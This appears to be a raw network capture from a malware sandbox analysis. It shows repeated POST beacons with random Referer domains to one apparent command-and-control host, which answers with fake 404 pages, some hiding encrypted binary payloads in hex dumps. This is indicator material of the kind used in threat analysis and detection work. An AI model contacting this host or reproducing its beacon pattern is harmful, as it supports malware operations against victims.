Dec 24, 2023 10:44:26.124552011 CET	278	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bqyhkwmkvqq.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 235 Host: stualialuyastrelia.net
Dec 24, 2023 10:44:26.416750908 CET	599	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:44:26 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Dec 24, 2023 10:44:26.447266102 CET	278	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cggsoyaypey.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 286 Host: stualialuyastrelia.net
Dec 24, 2023 10:44:26.739897966 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:44:26 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 36 36 0d 0a 02 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 59 8d 64 18 40 12 72 71 ec 42 89 bd 30 d1 55 7e bc 69 f0 5f cc ef b8 77 26 a5 e8 fc 2c 21 53 be 17 7e 13 c8 bb 09 37 c9 42 86 4c b1 97 23 31 73 c7 4c 4d f2 df 70 5d a5 e5 e9 9b 50 11 a8 bb ce 43 35 30 ce 0b e0 2d d8 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cc 00 2f d1 ff 41 d7 07 53 53 fa cb 1f 9e fd 09 50 0a ee 8c 86 6b 7e 75 f7 ff 78 5b 79 db c4 4b 07 13 ef 04 e1 92 24 18 4f c5 03 e1 cb a1 61 7e de e5 69 a9 19 17 7e 4f af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 7a d7 96 be 35 51 61 9a d4 3e 7c 8a 28 c9 08 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 3a 6c 33 6c 2a 7c 0a 8d 6b 15 e1 0e 78 eb 7e 71 eb 30 d4 1a f8 98 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 fb 0b b9 1e 68 cc 23 72 e1 0c 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 4e ff 9d bb 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 51 5e 6b 67 e6 1f 25 4b 81 43 df 8e 82 11 e8 e4 1f 6e a1 90 4e b1 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 0f 75 8f b7 af 57 a3 5f b3 80 1f d4 1c 68 91 9c 99 03 f1 2c 1e ae 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca e3 80 1e 00 18 50 6d 43 c8 d8 8a 8b e1 92 7f d7 9c e8 c2 e0 2b 59 b1 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b 23 b4 a6 88 37 00 80 e3 1c 7e 4a fa 52 48 a4 3d 96 4d bb e8 17 3f 8c e2 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 ee fc ae fd a4 06 ef f7 d3 77 75 c0 d4 5f f9 55 43 9c b5 09 62 18 fa 0b f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 83 e8 c8 ef e5 90 7a 9a e8 23 1e ac 88 bb 77 b3 0e 23 a0 19 13 98 b9 8c f5 b8 b6 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 89 43 d9 ad 29 c0 37 b0 75 fd 8b 18 e5 bb 01 7d 42 c3 a0 96 7f 78 2e 27 9d 6f 1d 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 20 38 30 1d d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d 01 28 2b 77 33 c3 00 45 3d 79 24 0d 1e eb 67 f9 7d d8 ef fe cd f0 a8 01 3f 26 58 c5 07 1f ad d6 46 43 7c 20 4b b2 cf dd a9 8c 29 02 3d 89 31 99 a5 13 01 6e 01 2e 10 72 c8 ad f4 ae e4 47 29 fb d8 a7 22 40 42 c1 6f 02 89 cc 05 81 55 Data Ascii: 1f66`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShGYd@rqB0U~i_w&,!S~7BL#1sLMp]PC50-dT[Up"XJ3Ob>!ZC:>/ASSPk~ux[yK$Oa~i~ODzN,z5Qa>\|(kJk?a]V4:l3l\|kx~q0JO;yLuVWh#r1er+Lc1<'i3FHU=hNU@Wd{9f(B@w=fdQ^kg%KCnNTUo)2([>T~uW_h,[}PmC+Yz(Fzk#7~JRH=M?~Mpvn%wu_UCb@3%}z#w#RLEsC)7u}Bx.'oBV`se%x 80xm^22B9GQ =TZ\Z_i9*nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=(+w3E=y$g}?&XFC\| K)=1n.rG)"@BoU
Dec 24, 2023 10:44:27.570478916 CET	280	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yedwqingjwrxr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 143 Host: stualialuyastrelia.net
Dec 24, 2023 10:44:27.862001896 CET	599	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:44:27 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Dec 24, 2023 10:44:27.886686087 CET	281	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://frwcyyflmifrrs.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 342 Host: stualialuyastrelia.net
Dec 24, 2023 10:44:28.180294037 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:44:28 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 36 36 0d 0a 00 00 b4 60 13 d4 0c 1a 40 10 16 30 80 b7 d3 87 84 4f 15 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 65 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 55 9e 7e 29 fc 53 68 0b 8e 22 f5 17 44 ef a3 86 04 12 fc 2a 54 e9 30 16 c7 37 f2 78 06 0d d2 1f fd dd fa e0 65 8c 71 cd 37 33 33 a7 b1 52 45 7c 0f 57 44 8d e8 be 3c 50 35 11 fe 08 32 b9 7f 18 64 3d 28 2c 87 6a dd d6 be db 43 17 5c 53 a6 cd f6 4d 55 64 51 14 5b fd 51 19 d0 57 7c 5a b1 15 22 18 cf 33 4f 72 3e 15 31 0b 5a a3 06 83 3a 56 2f cb 00 23 be 42 15 c7 07 53 53 fa cb 1f 9e 1d 09 52 2b 31 dd 98 7b 1a 45 f7 ff 78 ed 68 db 46 52 10 13 bf 1e e1 92 24 08 4f c5 03 b5 e1 a1 d1 3d de f5 69 f9 24 17 f6 45 af 9a a5 44 c9 a0 c1 b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d f0 4b bf 72 34 fd f8 12 6c 33 6c 29 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 37 da a9 37 4f 79 82 ae 02 94 07 4c 75 46 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 52 2b 4c e0 fe 60 9d 72 17 70 bb d6 e5 05 3c 27 d4 49 b2 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 3f 7f 55 00 79 00 1a 4d 07 e7 ac 04 4c dc 43 40 77 fb c2 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e c2 01 e8 24 31 28 cc e0 8b 1f 96 f1 c9 ea b8 1b 6f 03 cd 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 5f 6b 81 e9 e0 6c a7 bf e4 1f e4 a6 4d 06 9f 10 bb d9 b0 99 03 99 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fe ae 90 ee 17 76 1f 01 80 31 28 d2 ee 50 1f d0 5b 8c 7a 8f f0 6b e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 68 c4 3a f6 63 b9 82 7b 50 bf e5 7e c5 bc 70 d4 03 ab 91 98 76 72 0f ca 82 cf 02 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 03 b2 27 70 10 7b 3a 1d f8 c2 f5 ad 88 c1 a4 9c 33 25 85 d8 a9 c3 f4 ef 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 59 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d 43 29 0c 77 33 c3 00 45 27 94 0d 0d 1e eb 67 f9 45 07 f0 fe cd f0 a8 01 2d 2c 79 c5 e1 62 81 d6 96 44 5c 20 cb 12 e7 dd 65 43 07 02 61 f6 1a 99 a5 13 01 6e 01 2e 10 72 c8 ad f4 ae e4 47 29 fb d8 a7 22 40 42 c1 6f 02 89 cc 05 81 55 Data Ascii: 1f66`@0O}q4 IJ%9Wd8IkDJ8P>e%y^\.Kij}S.;vKs6(p_6k)\|pU~)Sh"DT07xeq733RE\|WD<P52d=(,jC\SMUdQ[QW\|Z"3Or>1Z:V/#BSSR+1{ExhFR$O=i$EDzN,%Qa>\|(HkJ{/aKr4l3l)\|~qhJ77OyLuFW;r#u1yR+L`rp<'I3FHU=h?UyMLC@w=fd0QpKk$1(o)2([T&}WL\h_klMtyPmCbzv1(P[zk7 Rh:c{P~pvr.5)C'p{:3%/#wNYRLEsCRW!}B.'<BV`se%x`80_xm^22B9GQ =TZ\Z_i9*nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=C)w3E'gE-,ybD\ eCan.rG)"@BoU
Dec 24, 2023 10:44:29.631783962 CET	283	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mqprrejcqtwyyvrf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 274 Host: stualialuyastrelia.net
Dec 24, 2023 10:44:29.941719055 CET	599	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:44:29 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Dec 24, 2023 10:44:29.944947958 CET	283	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gfxsapvvixyxnjeg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 287 Host: stualialuyastrelia.net
Dec 24, 2023 10:44:30.236577034 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:44:30 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 ca 05 11 fc f7 c7 be 55 f6 c7 35 f3 73 07 03 d2 ff f9 da fb eb b2 81 71 cd 87 3f 33 d1 60 73 45 7c 1f 57 44 b3 27 b2 3c 50 15 51 fe 08 22 b9 7f 18 66 7d 28 2a a7 6a dd d6 bc db 43 15 5c 53 a6 cd f6 4d 55 60 91 54 5b fd 55 19 d0 ed 25 7d b1 17 20 58 4a 33 4f 62 3e 17 21 0b 5a a3 06 83 3a 56 2f cb 00 23 be 52 15 d7 17 53 53 fa cb 1f 9e 0d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 88 43 59 db 8f 0d 13 13 bf fe ed 92 24 0e 4f c5 03 a1 cb a1 61 7e de f5 69 b9 19 17 7e 5f af 9a a5 44 c4 a0 cd b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d c0 5d bf 46 34 fd f8 12 4c 33 6c 21 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 e3 a0 f5 1a 20 9b 4a d8 19 ae cc 4f 3b 79 82 ae b2 e3 67 34 01 56 ad f3 13 94 26 b9 72 ce cc 23 b2 c5 02 31 79 90 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 43 11 bb b6 81 43 4f 55 b7 69 b7 9f 33 cf cc 46 d9 a8 19 ac af ed d9 55 3d 1d b6 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 26 e7 ac 44 06 f6 27 2c 18 f8 c7 9b 88 e7 3d 66 f1 8a 69 b1 1d 32 12 51 8c c8 1b 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 0e a1 54 17 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 1e 54 ab 1e 06 b2 1d ee c3 ce 57 a3 04 1d 85 1f d6 5c 6d 91 0c a1 0d f1 4c 18 af 03 58 e5 1f e4 86 79 10 99 20 e1 de b0 31 10 9d 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 de e0 d0 37 f4 80 e3 1c c8 20 f5 43 48 c2 25 9f 15 c1 e5 14 1a f1 e3 58 3e d6 71 d4 09 98 dd 99 76 64 72 e7 82 cf 21 2c 99 b6 e9 ed 35 98 9b ad 73 d4 ce d4 5b 2f 63 6c 9d 55 03 3b 8f 13 1f f8 40 bb 8e 04 c4 c4 a1 be 18 7d da a8 e6 38 09 2f cb e6 77 92 8f 23 1a aa 38 93 76 b3 0e ca 16 30 10 88 b9 9d 86 6a 96 52 b3 bf 96 9a 13 ec be 6c 6b e0 f0 73 d4 d4 f0 e9 07 b2 43 b3 69 9f 8b 12 4f ac 00 7d 42 02 a4 80 01 ac 2f 27 97 51 1c c0 a8 9f 21 c6 53 05 b4 65 a2 05 3d 79 60 38 51 21 a2 a7 b8 72 70 ae ea c0 45 d9 5f 32 d6 4b d6 25 3c be 3d 16 16 41 2b c4 16 10 8d ba c6 09 b7 3d db 01 f6 4d 69 60 58 5a 12 b5 39 73 10 8f 69 a0 73 10 2c 01 6e e0 83 68 b3 dc 91 00 31 87 75 0c 71 15 33 b1 ff 84 03 93 c2 07 1e 0b d2 85 b6 66 4f 46 62 93 41 c9 04 85 d4 b7 ea 00 60 10 3e b9 98 a4 e7 fe da ae 32 c8 6f d5 8d 5b ab e4 d1 3d 63 15 95 be af 84 e9 4d f2 92 3c 84 7a 58 5d 1c 7e 9b 37 76 d2 1d 85 ad ac d5 52 da cd 6f dd b2 3b 4a 1f d1 ad 90 e3 9c 25 71 77 22 8e 57 21 cc f8 78 31 66 cf 80 46 1d 42 cd 82 84 0c 84 ad f4 bf cb eb d9 f2 ec b2 5b 6b 7c ec ac 6f 42 8e 65 ff 90 49 90 ee 0a d9 4e 73 38 bb 69 f8 4d d4 32 5a 07 dd 61 3d 8f d4 1c 1d 03 0f 6e d9 ed 19 55 2b 2b 1a bb fb 35 71 d2 12 e4 26 0a 12 88 82 64 3d 3f 1c ca e3 dc 68 76 14 f5 ce 83 44 1b 8f c8 39 51 40 6c 4c 07 0d ed 03 fc ae 42 2b ac 09 2b bb 06 29 5c 3d bd 74 44 3d 73 aa 2d 8c 5d b1 6a 25 f3 e6 80 b9 f1 a8 0b b1 39 08 9d 07 1f ad fe 87 42 7c 26 63 15 cd dd af a4 2b 02 3d a2 32 9d a2 33 21 6f 01 2e 48 79 cd a3 f0 c1 c9 45 29 fd d2 a7 24 6a 51 f1 6a 02 e3 cc 05 81 5d Data Ascii: 1f66`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShGjU5sq?3`sE\|WD'<PQ"f}(jC\SMU`T[U%} XJ3Ob>!Z:V/#RSSR+{~ECY$Oa~i~_DzN,%Qa>\|(HkJ{/a]F4L3l!\|~q JO;yg4V&r#1yr+LCCOUi3FU=hU@Wd{9&D',=fi2QKk^To)2([TW\mLXy 1tyPmCbz+z(Fzk7 CH%X>qvdr!,5s[/clU;@}8/w#8v0jRlksCiO}B/'Q!Se=y`8Q!rpE_2K%<=A+=Mi`XZ9sis,nh1uq3fOFbA`>2o[=cM<zX]~7vRo;J%qw"W!x1fFB[k\|oBeINs8iM2Za=nU++5q&d=?hvD9Q@lLB++)\=tD=s-]j%9B\|&c+=23!o.HyE)$jQj]
Dec 24, 2023 10:44:30.729063988 CET	280	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mrhawlivvqmew.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 322 Host: stualialuyastrelia.net
